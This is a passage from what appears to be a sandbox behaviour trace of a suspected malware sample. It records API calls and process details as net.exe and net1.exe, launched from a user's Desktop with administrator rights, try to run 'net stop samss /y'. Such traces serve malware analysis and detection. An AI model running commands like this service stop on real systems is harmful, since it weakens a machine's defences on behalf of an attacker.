_wcsicmp (_String1=0x2a1ffc, _String2="stop") returned -15 [0218.221] _wcsicmp (_String1="share", _String2="stop") returned -12 [0218.221] _wcsicmp (_String1="start", _String2="stop") returned -14 [0218.221] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0218.221] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0218.221] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0218.222] _wcsicmp (_String1="accounts", _String2="samss") returned -18 [0218.222] _wcsicmp (_String1="computer", _String2="samss") returned -16 [0218.222] _wcsicmp (_String1="config", _String2="samss") returned -16 [0218.222] _wcsicmp (_String1="continue", _String2="samss") returned -16 [0218.222] _wcsicmp (_String1="cont", _String2="samss") returned -16 [0218.222] _wcsicmp (_String1="file", _String2="samss") returned -13 [0218.222] _wcsicmp (_String1="files", _String2="samss") returned -13 [0218.222] _wcsicmp (_String1="group", _String2="samss") returned -12 [0218.222] _wcsicmp (_String1="groups", _String2="samss") returned -12 [0218.222] _wcsicmp (_String1="help", _String2="samss") returned -11 [0218.222] _wcsicmp (_String1="helpmsg", _String2="samss") returned -11 [0218.222] _wcsicmp (_String1="localgroup", _String2="samss") returned -7 [0218.222] _wcsicmp (_String1="pause", _String2="samss") returned -3 [0218.222] _wcsicmp (_String1="session", _String2="samss") returned 4 [0218.222] _wcsicmp (_String1="sessions", _String2="samss") returned 4 [0218.222] _wcsicmp (_String1="sess", _String2="samss") returned 4 [0218.222] _wcsicmp (_String1="share", _String2="samss") returned 7 [0218.222] _wcsicmp (_String1="start", _String2="samss") returned 19 [0218.222] _wcsicmp (_String1="stats", _String2="samss") returned 19 [0218.222] _wcsicmp (_String1="statistics", _String2="samss") returned 19 [0218.222] _wcsicmp (_String1="stop", _String2="samss") returned 19 [0218.222] _wcsicmp (_String1="time", _String2="samss") returned 1 [0218.222] _wcsicmp (_String1="user", _String2="samss") returned 2 [0218.222] _wcsicmp (_String1="users", _String2="samss") returned 2 [0218.222] _wcsicmp (_String1="msg", _String2="samss") returned -6 [0218.222] _wcsicmp (_String1="messenger", _String2="samss") returned -6 [0218.222] _wcsicmp (_String1="receiver", _String2="samss") returned -1 [0218.222] _wcsicmp (_String1="rcv", _String2="samss") returned -1 [0218.222] _wcsicmp (_String1="netpopup", _String2="samss") returned -5 [0218.222] _wcsicmp (_String1="redirector", _String2="samss") returned -1 [0218.222] _wcsicmp (_String1="redir", _String2="samss") returned -1 [0218.222] _wcsicmp (_String1="rdr", _String2="samss") returned -1 [0218.222] _wcsicmp (_String1="workstation", _String2="samss") returned 4 [0218.222] _wcsicmp (_String1="work", _String2="samss") returned 4 [0218.223] _wcsicmp (_String1="wksta", _String2="samss") returned 4 [0218.223] _wcsicmp (_String1="prdr", _String2="samss") returned -3 [0218.223] _wcsicmp (_String1="devrdr", _String2="samss") returned -15 [0218.223] _wcsicmp (_String1="lanmanworkstation", _String2="samss") returned -7 [0218.223] _wcsicmp (_String1="server", _String2="samss") returned 4 [0218.223] _wcsicmp (_String1="svr", _String2="samss") returned 21 [0218.223] _wcsicmp (_String1="srv", _String2="samss") returned 17 [0218.223] _wcsicmp (_String1="lanmanserver", _String2="samss") returned -7 [0218.223] _wcsicmp (_String1="alerter", _String2="samss") returned -18 [0218.223] _wcsicmp (_String1="netlogon", _String2="samss") returned -5 [0218.223] _wcsupr (in: _String="samss" | out: _String="SAMSS") returned="SAMSS" [0218.223] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x26c05d0 [0218.226] GetServiceKeyNameW (in: hSCManager=0x26c05d0, lpDisplayName="SAMSS", lpServiceName=0x2c8c28, lpcchBuffer=0x1af7fc | out: lpServiceName="", lpcchBuffer=0x1af7fc) returned 0 [0218.227] _wcsicmp (_String1="msg", _String2="SAMSS") returned -6 [0218.227] _wcsicmp (_String1="messenger", _String2="SAMSS") returned -6 [0218.227] _wcsicmp (_String1="receiver", _String2="SAMSS") returned -1 [0218.227] _wcsicmp (_String1="rcv", _String2="SAMSS") returned -1 [0218.227] _wcsicmp (_String1="redirector", _String2="SAMSS") returned -1 [0218.227] _wcsicmp (_String1="redir", _String2="SAMSS") returned -1 [0218.227] _wcsicmp (_String1="rdr", _String2="SAMSS") returned -1 [0218.227] _wcsicmp (_String1="workstation", _String2="SAMSS") returned 4 [0218.227] _wcsicmp (_String1="work", _String2="SAMSS") returned 4 [0218.227] _wcsicmp (_String1="wksta", _String2="SAMSS") returned 4 [0218.227] _wcsicmp (_String1="prdr", _String2="SAMSS") returned -3 [0218.228] _wcsicmp (_String1="devrdr", _String2="SAMSS") returned -15 [0218.228] _wcsicmp (_String1="lanmanworkstation", _String2="SAMSS") returned -7 [0218.228] _wcsicmp (_String1="server", _String2="SAMSS") returned 4 [0218.228] _wcsicmp (_String1="svr", _String2="SAMSS") returned 21 [0218.228] _wcsicmp (_String1="srv", _String2="SAMSS") returned 17 [0218.228] _wcsicmp (_String1="lanmanserver", _String2="SAMSS") returned -7 [0218.228] _wcsicmp (_String1="alerter", _String2="SAMSS") returned -18 [0218.228] _wcsicmp (_String1="netlogon", _String2="SAMSS") returned -5 [0218.228] _wcsicmp (_String1="SAMSS", _String2="WORKSTATION") returned -4 [0218.228] _wcsicmp (_String1="SAMSS", _String2="LanmanWorkstation") returned 7 [0218.228] _wcsicmp (_String1="SAMSS", _String2="SERVER") returned -4 [0218.228] _wcsicmp (_String1="SAMSS", _String2="LanmanServer") returned 7 [0218.228] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0218.228] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0218.228] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0218.228] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0218.228] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0218.228] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0218.228] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0218.228] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0218.228] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0218.228] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0218.228] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0218.228] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0218.228] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0218.228] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0218.228] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0218.228] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0218.228] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0218.228] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0218.228] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0218.228] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0218.228] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0218.229] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0218.229] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0218.229] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0218.229] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0218.229] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0218.229] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0218.229] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0218.229] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0218.229] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0218.229] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x26c06e8 [0218.229] OpenServiceW (hSCManager=0x26c06e8, lpServiceName="SAMSS", dwDesiredAccess=0x84) returned 0x26c0710 [0218.230] ResolveDelayLoadedAPI () returned 0x73f29e60 [0218.230] ControlService (in: hService=0x26c0710, dwControl=0x4, lpServiceStatus=0x1af778 | out: lpServiceStatus=0x1af778*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0218.232] LocalAlloc (uFlags=0x40, uBytes=0x28) returned 0x26b4468 [0218.232] wcscpy_s (in: _Destination=0x26b4484, _SizeInWords=0x6, _Source="SAMSS" | out: _Destination="SAMSS") returned 0x0 [0218.232] CloseServiceHandle (hSCObject=0x26c06e8) returned 1 [0218.232] CloseServiceHandle (hSCObject=0x26c0710) returned 1 [0218.232] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x1af75c | out: Buffer=0x1af75c*=0x26c02d0) returned 0x0 [0218.232] _wcsicmp (_String1="SAMSS", _String2="WORKSTATION") returned -4 [0218.232] _wcsicmp (_String1="SAMSS", _String2="LanmanWorkstation") returned 7 [0218.232] _wcsicmp (_String1="SAMSS", _String2="SERVER") returned -4 [0218.232] _wcsicmp (_String1="SAMSS", _String2="LanmanServer") returned 7 [0218.232] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0218.232] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0218.232] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0218.232] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0218.232] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0218.232] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0218.232] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0218.232] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0218.232] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0218.232] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0218.232] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0218.233] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0218.233] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0218.233] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0218.233] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0218.233] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0218.233] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0218.233] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0218.233] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0218.233] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0218.233] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0218.233] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0218.233] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0218.233] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0218.233] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0218.233] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0218.233] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0218.233] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0218.233] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0218.233] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0218.233] wcsncpy_s (in: _Destination=0x26c04a4, _SizeInWords=0x6, _Source="SAMSS", _MaxCount=0x5 | out: _Destination="SAMSS") returned 0x0 [0218.233] wcsncpy_s (in: _Destination=0x26c0498, _SizeInWords=0x6, _Source="SAMSS", _MaxCount=0x5 | out: _Destination="SAMSS") returned 0x0 [0218.233] NetApiBufferFree (Buffer=0x26b4468) returned 0x0 [0218.233] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x1af67c | out: Buffer=0x1af67c*=0x26c1ff0) returned 0x0 [0218.233] OpenServiceW (hSCManager=0x26c05d0, lpServiceName="SAMSS", dwDesiredAccess=0xc) returned 0x26c0918 [0218.234] QueryServiceStatus (in: hService=0x26c0918, lpServiceStatus=0x1af680 | out: lpServiceStatus=0x1af680*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0218.234] NetApiBufferFree (Buffer=0x26c1ff0) returned 0x0 [0218.234] CloseServiceHandle (hSCObject=0x26c0918) returned 1 [0218.234] wcscpy_s (in: _Destination=0x2c7610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0218.234] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x23d0002 [0218.235] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x23d0002, dwMessageId=0x88f, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The requested pause, continue, or stop is not valid for this service.\r\n") returned 0x47 [0218.236] GetFileType (hFile=0x94) returned 0x2 [0218.236] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x1af5b8 | out: lpMode=0x1af5b8) returned 1 [0218.397] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x1af5c4, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x1af5c4*=0x47) returned 1 [0218.577] GetFileType (hFile=0x94) returned 0x2 [0218.577] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x1af5b8 | out: lpMode=0x1af5b8) returned 1 [0219.046] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af5c4, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x1af5c4*=0x2) returned 1 [0219.247] _ultow (in: _Dest=0x88f, _Radix=1766924 | out: _Dest=0x88f) returned="2191" [0219.247] FormatMessageW (in: dwFlags=0x2800, lpSource=0x23d0002, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="More help is available by typing NET HELPMSG 2191.\r\n") returned 0x34 [0219.247] GetFileType (hFile=0x94) returned 0x2 [0219.247] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x1af5dc | out: lpMode=0x1af5dc) returned 1 [0219.474] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af5e8, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x1af5e8*=0x34) returned 1 [0220.011] GetFileType (hFile=0x94) returned 0x2 [0220.012] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x1af5dc | out: lpMode=0x1af5dc) returned 1 [0220.481] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af5e8, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x1af5e8*=0x2) returned 1 [0221.044] NetApiBufferFree (Buffer=0x26b83f8) returned 0x0 [0221.044] NetApiBufferFree (Buffer=0x26b83c8) returned 0x0 [0221.044] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" [0221.044] exit (_Code=2) Thread: id = 7594 os_tid = 0x82bc Process: id = "49" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5faf0000" os_pid = "0x81b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"samss\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 7532 os_tid = 0x81bc Thread: id = 7860 os_tid = 0x86e8 Process: id = "50" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5167a000" os_pid = "0x82ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x81b8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 7606 os_tid = 0x82f0 Thread: id = 7607 os_tid = 0x82f4 Thread: id = 7676 os_tid = 0x8408 Thread: id = 7767 os_tid = 0x8578 Thread: id = 7768 os_tid = 0x857c Process: id = "51" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0xc178000" os_pid = "0x89b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x81b8" cmd_line = "C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 8047 os_tid = 0x89b8 [0221.663] GetModuleHandleA (lpModuleName=0x0) returned 0x2a0000 [0221.663] __set_app_type (_Type=0x1) [0221.663] __p__fmode () returned 0x76953c14 [0221.663] __p__commode () returned 0x769549ec [0221.664] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2a6f20) returned 0x0 [0221.664] __getmainargs (in: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610, _DoWildCard=0, _StartInfo=0x2bf61c | out: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610) returned 0 [0221.664] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0221.664] GetConsoleOutputCP () returned 0x1b5 [0222.567] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x2c6fa0 | out: lpCPInfo=0x2c6fa0) returned 1 [0222.568] SetThreadUILanguage (LangId=0x0) returned 0x2510409 [0222.857] sprintf_s (in: _DstBuf=0x267fde8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0222.857] setlocale (category=0, locale=".437") returned="English_United States.437" [0222.859] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0222.859] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0222.859] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" [0222.859] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x267fb90, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0222.859] RtlAllocateHeap (HeapHandle=0x27b0000, Flags=0x0, Size=0x5e) returned 0x27b4230 [0222.859] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0222.859] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x267fb8c | out: Buffer=0x267fb8c*=0x27b83c8) returned 0x0 [0222.859] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x267fb88 | out: Buffer=0x267fb88*=0x27b8470) returned 0x0 [0222.859] __iob_func () returned 0x76952608 [0222.859] _fileno (_File=0x76952608) returned 0 [0222.859] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0222.860] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0222.860] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0222.860] _wcsicmp (_String1="config", _String2="stop") returned -16 [0222.860] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0222.860] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0222.860] _wcsicmp (_String1="file", _String2="stop") returned -13 [0222.860] _wcsicmp (_String1="files", _String2="stop") returned -13 [0222.860] _wcsicmp (_String1="group", _String2="stop") returned -12 [0222.860] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0222.860] _wcsicmp (_String1="help", _String2="stop") returned -11 [0222.860] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0222.860] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0222.860] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0222.860] _wcsicmp (_String1="session", _String2="stop") returned -15 [0222.860] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0222.860] _wcsicmp (_String1=0x2a1ffc, _String2="stop") returned -15 [0222.860] _wcsicmp (_String1="share", _String2="stop") returned -12 [0222.860] _wcsicmp (_String1="start", _String2="stop") returned -14 [0222.860] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0222.860] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0222.860] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0222.860] _wcsicmp (_String1="accounts", _String2="samss") returned -18 [0222.860] _wcsicmp (_String1="computer", _String2="samss") returned -16 [0222.860] _wcsicmp (_String1="config", _String2="samss") returned -16 [0222.860] _wcsicmp (_String1="continue", _String2="samss") returned -16 [0222.860] _wcsicmp (_String1="cont", _String2="samss") returned -16 [0222.860] _wcsicmp (_String1="file", _String2="samss") returned -13 [0222.860] _wcsicmp (_String1="files", _String2="samss") returned -13 [0222.860] _wcsicmp (_String1="group", _String2="samss") returned -12 [0222.860] _wcsicmp (_String1="groups", _String2="samss") returned -12 [0222.860] _wcsicmp (_String1="help", _String2="samss") returned -11 [0222.861] _wcsicmp (_String1="helpmsg", _String2="samss") returned -11 [0222.861] _wcsicmp (_String1="localgroup", _String2="samss") returned -7 [0222.861] _wcsicmp (_String1="pause", _String2="samss") returned -3 [0222.861] _wcsicmp (_String1="session", _String2="samss") returned 4 [0222.861] _wcsicmp (_String1="sessions", _String2="samss") returned 4 [0222.861] _wcsicmp (_String1="sess", _String2="samss") returned 4 [0222.861] _wcsicmp (_String1="share", _String2="samss") returned 7 [0222.861] _wcsicmp (_String1="start", _String2="samss") returned 19 [0222.861] _wcsicmp (_String1="stats", _String2="samss") returned 19 [0222.861] _wcsicmp (_String1="statistics", _String2="samss") returned 19 [0222.861] _wcsicmp (_String1="stop", _String2="samss") returned 19 [0222.861] _wcsicmp (_String1="time", _String2="samss") returned 1 [0222.861] _wcsicmp (_String1="user", _String2="samss") returned 2 [0222.861] _wcsicmp (_String1="users", _String2="samss") returned 2 [0222.861] _wcsicmp (_String1="msg", _String2="samss") returned -6 [0222.861] _wcsicmp (_String1="messenger", _String2="samss") returned -6 [0222.861] _wcsicmp (_String1="receiver", _String2="samss") returned -1 [0222.861] _wcsicmp (_String1="rcv", _String2="samss") returned -1 [0222.861] _wcsicmp (_String1="netpopup", _String2="samss") returned -5 [0222.861] _wcsicmp (_String1="redirector", _String2="samss") returned -1 [0222.861] _wcsicmp (_String1="redir", _String2="samss") returned -1 [0222.861] _wcsicmp (_String1="rdr", _String2="samss") returned -1 [0222.861] _wcsicmp (_String1="workstation", _String2="samss") returned 4 [0222.861] _wcsicmp (_String1="work", _String2="samss") returned 4 [0222.861] _wcsicmp (_String1="wksta", _String2="samss") returned 4 [0222.861] _wcsicmp (_String1="prdr", _String2="samss") returned -3 [0222.861] _wcsicmp (_String1="devrdr", _String2="samss") returned -15 [0222.861] _wcsicmp (_String1="lanmanworkstation", _String2="samss") returned -7 [0222.861] _wcsicmp (_String1="server", _String2="samss") returned 4 [0222.861] _wcsicmp (_String1="svr", _String2="samss") returned 21 [0222.861] _wcsicmp (_String1="srv", _String2="samss") returned 17 [0222.861] _wcsicmp (_String1="lanmanserver", _String2="samss") returned -7 [0222.861] _wcsicmp (_String1="alerter", _String2="samss") returned -18 [0222.861] _wcsicmp (_String1="netlogon", _String2="samss") returned -5 [0222.862] _wcsupr (in: _String="samss" | out: _String="SAMSS") returned="SAMSS" [0222.862] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x27c0760 [0222.926] GetServiceKeyNameW (in: hSCManager=0x27c0760, lpDisplayName="SAMSS", lpServiceName=0x2c8c28, lpcchBuffer=0x267fafc | out: lpServiceName="", lpcchBuffer=0x267fafc) returned 0 [0222.927] _wcsicmp (_String1="msg", _String2="SAMSS") returned -6 [0222.927] _wcsicmp (_String1="messenger", _String2="SAMSS") returned -6 [0222.927] _wcsicmp (_String1="receiver", _String2="SAMSS") returned -1 [0222.927] _wcsicmp (_String1="rcv", _String2="SAMSS") returned -1 [0222.927] _wcsicmp (_String1="redirector", _String2="SAMSS") returned -1 [0222.927] _wcsicmp (_String1="redir", _String2="SAMSS") returned -1 [0222.927] _wcsicmp (_String1="rdr", _String2="SAMSS") returned -1 [0222.927] _wcsicmp (_String1="workstation", _String2="SAMSS") returned 4 [0222.927] _wcsicmp (_String1="work", _String2="SAMSS") returned 4 [0222.927] _wcsicmp (_String1="wksta", _String2="SAMSS") returned 4 [0222.927] _wcsicmp (_String1="prdr", _String2="SAMSS") returned -3 [0222.927] _wcsicmp (_String1="devrdr", _String2="SAMSS") returned -15 [0222.927] _wcsicmp (_String1="lanmanworkstation", _String2="SAMSS") returned -7 [0222.927] _wcsicmp (_String1="server", _String2="SAMSS") returned 4 [0222.927] _wcsicmp (_String1="svr", _String2="SAMSS") returned 21 [0222.927] _wcsicmp (_String1="srv", _String2="SAMSS") returned 17 [0222.927] _wcsicmp (_String1="lanmanserver", _String2="SAMSS") returned -7 [0222.927] _wcsicmp (_String1="alerter", _String2="SAMSS") returned -18 [0222.927] _wcsicmp (_String1="netlogon", _String2="SAMSS") returned -5 [0222.927] _wcsicmp (_String1="SAMSS", _String2="WORKSTATION") returned -4 [0222.928] _wcsicmp (_String1="SAMSS", _String2="LanmanWorkstation") returned 7 [0222.928] _wcsicmp (_String1="SAMSS", _String2="SERVER") returned -4 [0222.928] _wcsicmp (_String1="SAMSS", _String2="LanmanServer") returned 7 [0222.928] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0222.928] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0222.928] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0222.928] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0222.928] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0222.928] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0222.928] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0222.928] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0222.928] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0222.928] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0222.928] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0222.928] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0222.928] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0222.928] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0222.928] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0222.928] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0222.928] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0222.928] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0222.928] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0222.928] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0222.928] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0222.928] _wcsicmp (_String1="SAMSS", 